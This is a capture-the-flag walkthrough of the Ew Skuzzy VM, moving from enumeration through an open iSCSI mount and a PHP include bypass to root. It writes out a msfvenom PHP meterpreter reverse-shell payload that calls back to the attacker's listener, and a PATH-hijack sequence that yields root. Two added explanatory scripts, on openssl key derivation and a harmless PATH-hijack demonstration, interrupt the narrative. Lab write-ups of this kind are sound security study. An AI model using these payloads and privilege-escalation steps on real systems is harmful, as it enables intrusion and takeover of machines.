Ew Skuzzy CTF Walkthrough

Note: You'll notice the target IP switches from to . This is because it took me 2 days to solve the CTF and I shut down the VM in between.

This time I tried a fairly new CTF VM: Ew Skuzzy.

I started by running an nmap scan to see what was open:

# nmap -sV -p 1-65535

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-03-20 21:38 ART
Nmap scan report for
Host is up (0.0019s latency).
Not shown: 65532 closed ports
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    nginx
3260/tcp open  iscsi?
MAC Address: 2C:F0:EE:30:40:BE (Apple)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 446.20 seconds

I took a look at the HTTP server to see what was going on there:


Then I ran dirb to find some directories:

# dirb

DIRB v2.22
By The Dark Raver

START_TIME: Mon Mar 20 22:11:26 2017
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

GENERATED WORDS: 4612

---- Scanning URL: ----
+ (CODE:200|SIZE:1297)
==> DIRECTORY:
---- Entering directory: ----
==> DIRECTORY:
[...]
+ (CODE:200|SIZE:450)
---- Entering directory: ----
==> DIRECTORY:
[...]
+ (CODE:200|SIZE:527)
END_TIME: Mon Mar 20 22:17:49 2017

As you can see, it found 3 directories. Looking at those dirs I found some trolling, like:




But this last one wasn't so much of a troll. Looking at the source code:


And by base64 decoding it I got some directions.


This was clearly telling me to take a look at the other port, the iSCSI one.

I had never used this protocol and it took me a while to figure out how to connect to it. I must admit the service had no auth; otherwise I'd still be trying to get in there.

Basically I had to install open-iscsi in order to connect. I started the service and tried to discover the portal:

root@pss:~/ctf/ew# service iscsid start
root@pss:~/ctf/ew# iscsiadm -m discoverydb -t st -p 
# BEGIN RECORD 2.0-874
discovery.startup = manual
discovery.type = sendtargets
discovery.sendtargets.address =
discovery.sendtargets.port = 3260
discovery.sendtargets.auth.authmethod = None
discovery.sendtargets.auth.username = <empty>
discovery.sendtargets.auth.password = <empty>
discovery.sendtargets.auth.username_in = <empty>
discovery.sendtargets.auth.password_in = <empty>
discovery.sendtargets.timeo.login_timeout = 15
discovery.sendtargets.use_discoveryd = No
discovery.sendtargets.discoveryd_poll_inval = 30
discovery.sendtargets.reopen_max = 5
discovery.sendtargets.timeo.auth_timeout = 45
discovery.sendtargets.timeo.active_timeout = 30
discovery.sendtargets.iscsi.MaxRecvDataSegmentLength = 32768
root@pss:~/ctf/ew# iscsiadm -m discovery -t st -p
,1 iqn.2017-02.local.skuzzy:storage.sys0

At this point I just needed to log in to the target and mount it:

root@pss:~/ctf/ew# iscsiadm -m node --targetname iqn.2017-02.local.skuzzy:storage.sys0 -p --login
Logging in to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal:,3260] (multiple)
Login to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal:,3260] successful.
root@pss:~# mount /dev/sdb /mnt
root@pss:~# cd /mnt/

Listing the files, I found something I was looking for!

root@pss:/mnt# ls
bobsdisk.dsk  flag1.txt  lost+found
root@pss:/mnt# cat flag1.txt 
Congratulations! You've discovered the first flag!


Let's see how you go with the next one...

Then I needed to know what that bobsdisk.dsk file was, so I ran file on it:

root@pss:/mnt# file bobsdisk.dsk 
bobsdisk.dsk: Linux rev 1.0 ext2 filesystem data, UUID=faef0c66-b61b-4d80-8c20-5e8da65345d4 (large files)

It's a disk dump! Let's see if I can mount it!

root@pss:/mnt# mkdir ~/ctf/ew/dsk
root@pss:/mnt# mount bobsdisk.dsk ~/ctf/ew/dsk/
root@pss:/mnt# cd ~/ctf/ew/dsk/
root@pss:~/ctf/ew/dsk# ls
lost+found  ToAlice.csv.enc  ToAlice.eml
root@pss:~/ctf/ew/dsk# less ToAlice.eml 
root@pss:~/ctf/ew/dsk# cat ToAlice.eml | grep flag
PPS: flag2{054738a5066ff56e0a4fc9eda6418478d23d3a7f}

I had my second flag!

The next step was to find out what the encrypted file contained. Looking closely at the ToAlice.eml file, we find everything we need to decrypt it:

root@pss:~/ctf/ew/dsk# openssl aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ./decrypted.txt
enter aes-256-cbc decryption password:
root@pss:~/ctf/ew/dsk# ls
decrypted.txt  lost+found  ToAlice.csv.enc  ToAlice.eml
root@pss:~/ctf/ew/dsk# cat decrypted.txt 
Web Path,Reason
5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site! 
c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?
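The openssl command above only works because the -md digest matches the one used when ToAlice.csv.enc was created: with a password-based `openssl enc`, the AES key and IV are derived from the password and the 8-byte salt (stored after the "Salted__" header) by EVP_BytesToKey, using whatever digest -md names. The following is an added example, not part of the original walkthrough, that round-trips a constructed CSV with a constructed password and shows that decrypting with the wrong digest does not recover the plaintext:

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: round-trip a small
# file through `openssl enc -aes-256-cbc` to show why the -md digest has to
# match the one used at encryption time. Plaintext and password are
# constructed stand-ins; the real password is in ToAlice.eml.
set -eu
work=$(mktemp -d)
trap 'rm -rf "$work"' EXIT

password='demo-passphrase'
printf 'Web Path,Reason\nexample,constructed sample row\n' > "$work/plain.csv"

# Password-based, salted encryption. Key and IV are derived from the
# password and the 8-byte salt (stored after the "Salted__" header) by
# EVP_BytesToKey using the digest named by -md.
encrypt() {
    openssl enc -aes-256-cbc -salt -md sha256 -pass "pass:$password" \
        -in "$work/plain.csv" -out "$work/enc.bin"
}

# Decrypt with the digest given as $1; returns openssl's exit status.
decrypt() {
    openssl enc -d -aes-256-cbc -md "$1" -pass "pass:$password" \
        -in "$work/enc.bin" -out "$work/dec_$1.csv" 2>/dev/null
}

# Prints "yes" if decrypting with digest $1 reproduces the plaintext.
# A wrong digest means a wrong key: usually "bad decrypt" (the padding
# check fails), occasionally garbage that happens to pass the padding
# check, so compare the bytes rather than trusting the exit status alone.
roundtrip_matches() {
    if decrypt "$1" && cmp -s "$work/plain.csv" "$work/dec_$1.csv"; then
        echo yes
    else
        echo no
    fi
}

encrypt
echo "header: $(head -c 8 "$work/enc.bin")"                    # Salted__
echo "decrypt with -md sha256: $(roundtrip_matches sha256)"   # yes
echo "decrypt with -md md5:    $(roundtrip_matches md5)"      # no
```

The reason -md matters in practice: OpenSSL 1.1.0 changed the default digest for this key derivation from md5 to sha256, so a file encrypted on one version and decrypted on another fails unless the digest is given explicitly. For anything new, prefer `-pbkdf2` (OpenSSL 1.1.1 and later) over the legacy EVP_BytesToKey derivation, and pass it on both sides.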

So I had the third flag, and some web directories to look for:

The first one was just crap. :P

First Directory

The second one was different, some kind of CMS.

Second Directory

One of the URLs was loading content, more precisely this one:

I had a really bad time figuring out how to bypass that file.

I noticed that if I entered a URL different from , it asked for a key. Not only that: if you add a key parameter with one of the previous flags we found, the message changes to say that the key is invalid.

After some time I noticed the p param was loading plain files; for instance ?p=flag loads the flag.php file. So I tried to access the data.txt file directly.

Data txt file

The interesting part here is that the opening and closing tags were ##php## instead of the conventional ones. Finally I found a way to bypass some sort of eval function by converting the file to base64 first. That way the reader only displays the file content. Since I already knew about the ?p param, I went for the flag.php file directly.

base64 encoded flag.php file

When decoding it I found the fourth flag!

base64 decoded flag.php file


So the next step was to get a shell! This step was somehow the easiest in the whole CTF. I already knew a key parameter was needed to load external files. I also knew it had the flag format because of the error message change. I tried flag4 as the key and it was the right one!

So I created a PHP reverse shell with msfvenom:

root@pss:~/ctf/ew# msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=6000 R > www/shell1.txt
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 948 bytes

I had forgotten that I saw in the data.txt file that it was using weird opening/closing tags, ##php## instead of the standard ones. I edited the shell.php file and tried again.

And I served it with Python:

root@pss:~/ctf/ew/www# python -m SimpleHTTPServer 80
Serving HTTP on port 80 ...

Then from msfconsole I got ready to catch the shell! :P

root@pss:~/ctf/ew/www# msfconsole 

             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! \
                 ;@'. __*__,."    \|--- \_____________/

Love leveraging credentials? Check out bruteforcing
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.13.21-dev                         ]
+ -- --=[ 1621 exploits - 924 auxiliary - 282 post        ]
+ -- --=[ 472 payloads - 39 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/handler 
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 6000
LPORT => 6000
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set payload php/meterInterrupt: use the 'exit' command to quit
msf exploit(handler) > Interrupt: use the 'exit' command to quit
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST     yes       The listen address
   LPORT  6000             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > exploit

[*] Started reverse TCP handler on 
[*] Starting the payload handler...
[*] Sending stage (33986 bytes) to
[*] Meterpreter session 1 opened ( -> at 2017-03-21 10:40:34 -0300

meterpreter > sysinfo
Computer    : skuzzy
OS          : Linux skuzzy 4.4.0-64-generic #85-Ubuntu SMP Mon Feb 20 11:50:30 UTC 2017 x86_64
Meterpreter : php/linux
meterpreter > 

I got a session as soon as I hit the CTF VM with the following URL: {4e44db0f1edc3c361dbf54eaf4df40352db91f8b}&url=

After getting trolled and trolled, and kicked and trolled, I got to /opt.

Listing: /opt

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
104755/rwxr-xr-x  8736  fil   2017-03-02 09:28:40 -0300  alicebackup

meterpreter > shell
Process 1967 created.
Channel 4 created.
uid=0(root) gid=0(root) groups=0(root),33(www-data)
ssh: Could not resolve hostname alice.home: Name or service not known
lost connection

uid=33(www-data) gid=33(www-data) groups=33(www-data)

ssh alice.home
Pseudo-terminal will not be allocated because stdin is not a terminal.
ssh: Could not resolve hostname alice.home: Name or service not known

Reading the ./alicebackup binary output, we can see it's trying to run 2 commands, id and ssh. I also ran them myself so you can check that the outputs are the same.

What we need to get root is to modify PATH so that our own id or ssh command (a shell) gets run instead. Since alicebackup looks like it's running id as root, I tried replacing id first.

When running alicebackup again, instead of running id as root it'll run sh as root, giving me a root shell.
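The trick works because alicebackup calls id by bare name, so the loader resolves it through the caller's PATH. The following is an added example, not part of the original walkthrough and not the CTF's alicebackup binary: a constructed stand-in helper that runs id, a fake id dropped into a writable directory, and the two PATH settings side by side. Since the sandbox is not root, the fake id just prints a marker instead of spawning a shell.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: shows how a program
# that invokes `id` by bare name picks up whatever `id` comes first in PATH.
# The "alicebackup" here is a constructed stand-in script, not the CTF's
# binary; the fake id prints a marker instead of spawning a shell.
set -eu
work=$(mktemp -d)
trap 'rm -rf "$work"' EXIT

# Stand-in for a privileged helper that runs `id` without a full path.
cat > "$work/alicebackup" <<'EOF'
#!/bin/sh
id
EOF
chmod +x "$work/alicebackup"

# Attacker-controlled `id` in a writable directory (cp /bin/sh id in the
# walkthrough). Here it only announces that it was reached.
cat > "$work/id" <<'EOF'
#!/bin/sh
echo HIJACKED
EOF
chmod +x "$work/id"

# Run the helper with a caller-supplied PATH in its environment.
run_with_path() {
    PATH="$1" "$work/alicebackup"
}

# What the attacker does: prepend the writable directory to PATH.
hijacked_output() { run_with_path "$work:$PATH"; }

# What the helper should do instead: ignore the caller's PATH and use a
# fixed trusted one (or call /usr/bin/id by absolute path).
trusted_output() { run_with_path "/usr/bin:/bin"; }

echo "attacker PATH: $(hijacked_output)"   # HIJACKED
echo "trusted PATH:  $(trusted_output)"    # uid=... from the real id
```

The fix on the defending side is the mirror image of the attack: a setuid or root-run helper must either call its tools by absolute path or reset PATH to a trusted value before doing anything else, and must never inherit PATH (or other environment such as LD_PRELOAD) from the unprivileged caller.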

The following is just the command sequence to get root and grab the last flag!

cd /tmp
cp /bin/sh id
echo $PATH
export PATH=/tmp:$PATH
echo $PATH
cd /opt

cd /root
ls -la
total 24
drwx------  3 root root 4096 Mar  2 22:36 .
drwxr-xr-x 23 root root 4096 Feb 28 06:51 ..
-rw-r--r--  1 root root 3106 Oct 23  2015 .bashrc
-rw-r--r--  1 root root  148 Aug 18  2015 .profile
drwx------  2 root root 4096 Mar  2 22:36 .ssh
-rw-r--r--  1 root root  493 Mar  2 22:04 flag.txt
cat flag.txt


You've found the final flag and pwned this CTF VM!

I really hope this was an enjoyable challenge, and that my trolling and messing with you didn't upset you too much! I had a blast making this VM, so it won't be my last!

I'd love to hear your thoughts on this one.
Too easy?
Too hard?
Too much stuff to install to get the iSCSI initiator working?

Drop me a line on twitter @vortexau, or via email vortex@juicedigital.net

I found this VM really fun and challenging. The 2 steps that were really hard to solve were the iSCSI service and the base64 filtering on the PHP portal. Also, I learned a lot from this, mainly because of the trolling and the many false positives or false clues set up, like the Seinfeld scripts.

The soup nazi